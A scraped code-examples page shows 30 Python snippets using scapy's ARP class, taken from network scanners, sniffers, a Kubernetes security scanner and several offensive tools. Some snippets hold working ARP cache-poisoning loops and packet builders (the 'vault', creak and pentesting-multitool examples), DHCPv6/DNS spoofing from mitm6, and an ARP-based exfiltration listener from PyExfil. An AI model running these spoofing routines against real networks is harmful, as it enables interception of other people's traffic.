Python scapy.all.ARP Examples
The following are 30
code examples of scapy.all.ARP().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
scapy.all
, or try the search function
.
.
Example #1
| Source File: network_scanner.py From Wifi_BruteForce with GNU General Public License v2.0 | 12 votes |
|
def scan_ips(interface='wlan0', ips='192.168.1.0/24'):
"""a simple ARP scan with Scapy"""
try:
print('[*] Start to scan')
conf.verb = 0 # hide all verbose of scapy
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
arp = ARP(pdst = ips)
answer, unanswered = srp(ether/arp, timeout = 2, iface = interface, inter = 0.1)
for sent, received in answer:
print(received.summary())
except KeyboardInterrupt:
print('[*] User requested Shutdown')
print('[*] Quitting...')
sys.exit(1)
Example #2
| Source File: arpspoof.py From HomeAssistant-CustomComponents with Apache License 2.0 | 6 votes |
|
def restore(self, index):
try:
victimIP = self._devices[index][0]
victimMAC = self._devices[index][1]
_LOGGER.info("Enabling internet for device IP: %s MAC: %s",
victimIP, victimMAC)
del self._devices[index]
send(ARP(op=2, pdst=victimIP, hwdst=victimMAC, psrc=self._router_ip,
hwsrc=self._router_mac), count=4, iface=self._interface, verbose=False)
send(ARP(op=2, pdst=self._router_ip, hwdst=self._router_mac, psrc=victimIP,
hwsrc=victimMAC), count=4, iface=self._interface, verbose=False)
except:
_LOGGER.error("Error when restoring device index: %s", index)
Example #3
| Source File: network_scanner.py From hacking_tools with MIT License | 6 votes |
|
def scan(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1,
verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc}
clients_list.append(client_dict)
return clients_list
Example #4
| Source File: mitm6.py From mitm6 with GNU General Public License v2.0 | 6 votes |
|
def parsepacket(p):
if DHCP6_Solicit in p:
target = get_target(p)
if should_spoof_dhcpv6(target.host):
send_dhcp_advertise(p[DHCP6_Solicit], p, target)
if DHCP6_Request in p:
target = get_target(p)
if p[DHCP6OptServerId].duid == config.selfduid and should_spoof_dhcpv6(target.host):
send_dhcp_reply(p[DHCP6_Request], p)
print('IPv6 address %s is now assigned to %s' % (p[DHCP6OptIA_NA].ianaopts[0].addr, pcdict[p.src]))
if DHCP6_Renew in p:
target = get_target(p)
if p[DHCP6OptServerId].duid == config.selfduid and should_spoof_dhcpv6(target.host):
send_dhcp_reply(p[DHCP6_Renew],p)
print('Renew reply sent to %s' % p[DHCP6OptIA_NA].ianaopts[0].addr)
if ARP in p:
arpp = p[ARP]
if arpp.op is 2:
#Arp is-at package, update internal arp table
arptable[arpp.hwsrc] = arpp.psrc
if DNS in p:
if p.dst == config.selfmac:
send_dns_reply(p)
Example #5
| Source File: daemon_app.py From upribox with GNU General Public License v3.0 | 6 votes |
|
def run(self):
"""Starts the thread, which is sniffing incoming ARP packets and sends out packets to spoof
all clients on the network and the gateway. This packets are sent every __SLEEP seconds.
Note:
First, a ARP request packet is generated for every possible client of the network.
This packets are directed at the gateway and update existing entries of the gateway's ARP table.
So the gateway is not flooded with entries for non-existing clients.
Second, a GARP broadcast request packet is generated to spoof every client on the network.
"""
# start sniffing thread
self.sniffthread.start()
# generates a packet for each possible client of the network
# these packets update existing entries in the arp table of the gateway
# packets = [Ether(dst=self.gate_mac) / ARP(op=1, psrc=str(x), pdst=str(x)) for x in self.ip_range]
# gratuitous arp to clients
# updates the gateway entry of the clients arp table
packets = [Ether(dst=ETHER_BROADCAST) / ARP(op=1, psrc=self.ipv4.gateway, pdst=self.ipv4.gateway, hwdst=ETHER_BROADCAST)]
while True:
sendp(packets)
time.sleep(self.__SLEEP)
Example #6
| Source File: utils.py From creak with GNU General Public License v3.0 | 6 votes |
|
def build_arp_packet(source_mac, src=None, dst=None):
""" forge arp packets used to poison and reset target connection """
arp = dpkt.arp.ARP()
packet = dpkt.ethernet.Ethernet()
if not src or not dst:
return False
arp.sha = string_to_binary(source_mac)
arp.spa = inet_aton(dst)
arp.tha = '\x00' * 6
arp.tpa = inet_aton(src)
arp.op = dpkt.arp.ARP_OP_REPLY
packet.src = string_to_binary(source_mac)
packet.dst = '\xff' * 6 # broadcast address
packet.data = arp
packet.type = dpkt.ethernet.ETH_TYPE_ARP
return packet
Example #7
| Source File: mitm.py From creak with GNU General Public License v3.0 | 6 votes |
|
def restore(self, delay, target_b=None):
if not target_b:
target_b = self.gateway
src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
if not isinstance(self.target, list):
dst_mac = utils.get_mac_by_ip(self.target)
send(ARP(op=2, pdst=target_b, psrc=self.target,
hwdst="ff:" * 5 + "ff", hwsrc=dst_mac), count=3, verbose=False)
send(ARP(op=2, pdst=self.target, psrc=target_b,
hwdst="ff:" * 5 + "ff", hwsrc=src_mac), count=3, verbose=False)
else:
for addr in self.target:
dst_mac = utils.get_mac_by_ip(addr)
send(ARP(op=2, pdst=target_b, psrc=addr,
hwdst="ff:" * 5 + "ff", hwsrc=dst_mac), count=3, verbose=False)
send(ARP(op=2, pdst=addr, psrc=target_b,
hwdst="ff:" * 5 + "ff", hwsrc=src_mac), count=3, verbose=False)
Example #8
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def generatePacket(self):
"""
Generates scapy packet for spoofing
the target and the router
"""
target_arp_packet = scapy.ARP(op=2, hwdst=self.target_mac,
pdst=self.target_ip, psrc=self.router_ip)
router_arp_packet = scapy.ARP(op=2, hwdst=self.router_mac,
pdst=self.router_ip, psrc=self.target_ip)
return target_arp_packet, router_arp_packet
Example #9
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def restore(self):
"""
Restores the IP tables of the target and the router
to the default state (before ARP spoof attack)
"""
colors.info('Restoring IP tables')
target_arp_packet = scapy.ARP(op=2, pdst=self.target_ip,
hwdst=self.target_mac,
psrc=self.router_ip,
hwsrc=self.router_mac)
router_arp_packet = scapy.ARP(op=2, pdst=self.router_ip,
hwdst=self.router_mac,
psrc=self.target_ip,
hwsrc=self.target_mac)
COUNT = 10 # Send 10 packets to restore
while COUNT > 0:
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
COUNT = COUNT - 1
colors.success('ARP Table restored')
Example #10
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def networkScan(self):
"""
Peform ARP scanning over the IP range
"""
ip = str(input('>> Enter the IP address to start scanning : '))\
.strip()
if self.validateIP(ip):
try:
colors.info('Initiating ARP Scan')
from lib.scanner.ip_scanner import arp_scanner
arpScanObj = arp_scanner.ARPScan(ip=ip,
start_ip=None,
end_ip=None,
threads=50)
total_index, result_dict = arpScanObj.threadingScan()
index = -1
while index > total_index or index <= 0:
index = int(input('>> Enter the index of the target IP: '))
self.target_ip = result_dict[index][0]
self.target_mac = result_dict[index][1]
colors.success('Target IP set to: {}'.format(self.target_ip))
colors.success('Target MAC set to: {}'.format(self.target_mac))
except ImportError:
colors.error('Could not import the required module.')
except Exception as e:
print(e)
else:
colors.error('Please enter a valid IP address...')
self.networkScan()
Example #11
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def getMAC(self, IP, name):
"""
Fetches MAC address of the selected IP
"""
arp_packet = scapy.ARP(pdst=IP)
broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_broadcast = broadcast/arp_packet
broadcast = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]
mac_addr_str = self.capture_output(broadcast)
mac_addr = re.findall(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w',
mac_addr_str)[0]
mac_addr = str(mac_addr).strip()
colors.success('Found MAC address for {} : {} is : {}'
.format(name, IP, mac_addr))
val = str(input('>> Enter(Y/y) to continue or enter MAC address : '))\
.strip()
if val == 'Y' or val == 'y':
return mac_addr
elif self.validateMAC(val):
colors.info('Setting MAC address for {} : {} : {}'
.format(name, IP, val))
return val
else:
colors.error('Please enter a valid MAC address...')
self.getMAC(IP, name)
Example #12
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def startSpoof(self):
"""
Starts ARP spoofing
"""
t1 = time.time()
colors.info('ARP Spoofing started...')
colors.info('Press CTRL+C to exit...')
try:
while True:
target_arp_packet, router_arp_packet = self.generatePacket()
scapy.send(target_arp_packet, verbose=False)
scapy.send(router_arp_packet, verbose=False)
self.no_of_packets = self.no_of_packets + 1
print('[+] Packets sent : {}'.format(self.no_of_packets),
end='\r')
time.sleep(self.INTER)
except KeyboardInterrupt:
colors.info('Stopping ARP spoof')
except Exception as e:
print(e)
finally:
self.restore()
t2 = time.time()
colors.success('ARP Spoof completed in : {}'.format(t2-t1))
Example #13
| Source File: cmd_arp_sniff.py From habu with BSD 3-Clause "New" or "Revised" License | 5 votes |
|
def procpkt(pkt):
now = time()
output = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'
if conf.manufdb:
manufdb_available = True
else:
manufdb_available = False
if 'ARP' in pkt:
hosts[pkt[ARP].psrc] = {}
hosts[pkt[ARP].psrc]['hwaddr'] = pkt[ARP].hwsrc
hosts[pkt[ARP].psrc]['time'] = time()
if manufdb_available:
hosts[pkt[ARP].psrc]['vendor'] = conf.manufdb._get_manuf(pkt[ARP].hwsrc)
else:
hosts[pkt[ARP].psrc]['vendor'] = 'unknown'
click.clear()
if not manufdb_available:
click.echo('WARNING: manufdb is not available. Can\'t get vendor.')
for ip in sorted(hosts):
print(output.format(
seconds = int(now - hosts[ip]['time']),
ip = ip,
hwaddr = hosts[ip]['hwaddr'],
vendor = hosts[ip]['vendor']
))
Example #14
| Source File: communicator.py From PyExfil with MIT License | 5 votes |
|
def __init__(self, key=PYEXFIL_DEFAULT_PASSWORD, retFunc=testCallBack):
"""
Start the brokering server listener.
:param server: Server bind addr [str]
:param port: Listening Port [int]
:param key: Key for AES-OFB mode. [str]
:param retFunc: The function to call when a packet comes in.
:return: None
"""
logging.info('Now listening for ARP Broadcasts.')
logging.info('Hit \'exit\' to quit.')
self.retFunc = retFunc
self.key = key
Example #15
| Source File: communicator.py From PyExfil with MIT License | 5 votes |
|
def parse_message(self, pkt): """ Start the brokering server listener. :param ip: Client IP addr [str] :return: None """ # Here is where you want to hook up to automate communication # with the clients. if pkt[ARP].op is not 1: # Not 'who has?' return if pkt[Ether].dst.lower() != "ff:ff:ff:ff:ff:ff": # Not broadcast return try: # pkt[ARP][Padding].show() payload = pkt[ARP][Padding].load except: pass decPayload = AESDecryptOFB(key=self.key, text=payload) if self.retFunc is not None: self.retFunc(pkt ,decPayload)
Example #16
| Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
|
def mac_getter(self, IP):
# Sending ARP for take the MAC address
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), timeout=2, iface=self.interface, inter=0.2)
for send, receive in ans:
return receive.sprintf(r"%Ether.src%")
Example #17
| Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
|
def ARPing(self):
victimMAC = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Creating and sending ARP packets for try to hide the attack
send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=AP_MAC), count=10)
send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=10)
# Disabling IP Forwarding
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
exit()
Example #18
| Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
|
def sending_arp(self):
victim = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Those replies places us between them (ARP Spoofing)
send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst=victim))
send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst=AP_MAC))
Example #19
| Source File: scraps.py From Naumachia with MIT License | 5 votes |
|
def process(self, pkt):
if all(layer in pkt for layer in (scapy.Ether, scapy.ARP)):
if pkt[scapy.Ether].src != str(net.ifhwaddr(self.iface)) and pkt[scapy.ARP].op == 1: # who-has
resp = scapy.Ether()/scapy.ARP(hwsrc=str(net.ifhwaddr('tap0')), hwdst=pkt.hwsrc, psrc=pkt.pdst, pdst=pkt.psrc, op="is-at")
scapy.sendp(resp, iface='tap0')
if pkt.pdst not in self.ips:
self.ips.add(pkt.pdst)
cidr = '{!s}/{:d}'.format(pkt.pdst, 28)
logger.info("Attaching new IP address {:s} to {:s}".format(cidr, self.iface))
subprocess.run(['ip', 'addr', 'add', cidr, 'dev', self.iface])
Example #20
| Source File: arpspoof.py From HomeAssistant-CustomComponents with Apache License 2.0 | 5 votes |
|
def spoof(self, index):
try:
victimIP = self._devices[index][0]
victimMAC = self._devices[index][1]
try:
send(ARP(op=2, pdst=victimIP, psrc=self._router_ip,
hwdst=victimMAC), iface=self._interface, verbose=False)
send(ARP(op=2, pdst=self._router_ip, psrc=victimIP,
hwdst=self._router_mac), iface=self._interface, verbose=False)
except:
_LOGGER.error("Error when trying to spoof device IP: %s MAC: %s",
victimIP, victimMAC)
except IndexError:
_LOGGER.error("Error when trying to spoof device index: %s", index)
Example #21
| Source File: cmd_arp_sniff.py From habu with BSD 3-Clause "New" or "Revised" License | 5 votes |
|
def cmd_arp_sniff(iface):
"""Listen for ARP packets and show information for each device.
Columns: Seconds from last packet | IP | MAC | Vendor
Example:
\b
1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
print("Waiting for ARP packets...", file=sys.stderr)
sniff(filter="arp", store=False, prn=procpkt)
Example #22
| Source File: cmd_arp_ping.py From habu with BSD 3-Clause "New" or "Revised" License | 5 votes |
|
def cmd_arp_ping(ip, iface, verbose):
"""
Send ARP packets to check if a host it's alive in the local network.
Example:
\b
# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)
for _, pkt in res:
if verbose:
print(pkt.show())
else:
print(pkt.summary())
Example #23
| Source File: utils.py From creak with GNU General Public License v3.0 | 5 votes |
|
def get_mac_by_ip_s(ip_address, delay):
"""try to retrieve MAC address associated with ip using Scapy library """
responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),
timeout=delay, retry=10)
# return the MAC address from a response
for _, response in responses:
return response[Ether].src
return None
Example #24
| Source File: mitm.py From creak with GNU General Public License v3.0 | 5 votes |
|
def poison(self, delay, target_b=None):
"""
poison arp cache of target and router, causing all traffic between them to
pass inside our machine, MITM heart
"""
if not target_b:
target_b = self.gateway
utils.set_ip_forward(1)
sock = socket(PF_PACKET, SOCK_RAW)
sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
try:
while True:
if self.debug:
log.info('[+] %s <-- %s -- %s -- %s --> %s',
target_b, self.target, self.dev, target_b, self.target)
if not isinstance(self.target, list):
sock.send(str(utils.build_arp_packet(
self.src_mac, target_b, self.target)))
sock.send(str(utils.build_arp_packet(
self.src_mac, self.target, target_b)))
time.sleep(delay) # OS refresh ARP cache really often
else:
for addr in self.target:
sock.send(str(utils.build_arp_packet(self.src_mac, target_b, addr)))
sock.send(str(utils.build_arp_packet(self.src_mac, addr, target_b)))
time.sleep(delay) # OS refresh ARP cache really often
except KeyboardInterrupt:
print('\n\r[+] Poisoning interrupted')
sock.close()
Example #25
| Source File: mitm.py From creak with GNU General Public License v3.0 | 5 votes |
|
def poison(self, delay, target_b=None):
if not target_b:
target_b = self.gateway
src_mac = ':'.join(a+b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
if not isinstance(self.target, list):
dst_mac = utils.get_mac_by_ip(self.target)
send(ARP(op=2, pdst=self.target, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=self.target, hwdst=src_mac), verbose=False)
else:
for addr in self.target:
dst_mac = utils.get_mac_by_ip(addr)
send(ARP(op=2, pdst=addr, psrc=target_b, hwdst=dst_mac), verbose=False)
send(ARP(op=2, pdst=target_b, psrc=addr, hwdst=src_mac), verbose=False)
Example #26
| Source File: dns.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def get_kube_dns_ip_mac(self):
config = get_config()
kubedns_svc_ip = self.extract_nameserver_ip()
# getting actual pod ip of kube-dns service, by comparing the src mac of a dns response and arp scanning.
dns_info_res = srp1(
Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()),
verbose=0,
timeout=config.network_timeout,
)
kubedns_pod_mac = dns_info_res.src
self_ip = dns_info_res[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:
return response[ARP].psrc, response.src
Example #27
| Source File: arp.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def try_getting_mac(self, ip):
config = get_config()
ans = sr1(ARP(op=1, pdst=ip), timeout=config.network_timeout, verbose=0)
return ans[ARP].hwsrc if ans else None
Example #28
| Source File: arp.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def detect_l3_on_host(self, arp_responses):
""" returns True for an existence of an L3 network plugin """
logger.debug("Attempting to detect L3 network plugin using ARP")
unique_macs = list(set(response[ARP].hwsrc for _, response in arp_responses))
# if LAN addresses not unique
if len(unique_macs) == 1:
# if an ip outside the subnets gets a mac address
outside_mac = self.try_getting_mac("1.1.1.1")
# outside mac is the same as lan macs
if outside_mac == unique_macs[0]:
return True
# only one mac address for whole LAN and outside
return False
Example #29
| Source File: arp.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
Example #30
| Source File: arp_spoofing.py From hacking_tools with MIT License | 5 votes |
|
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1,
verbose=False)[0]
return answered_list[0][1].hwsrc
# Change mac address in arp table
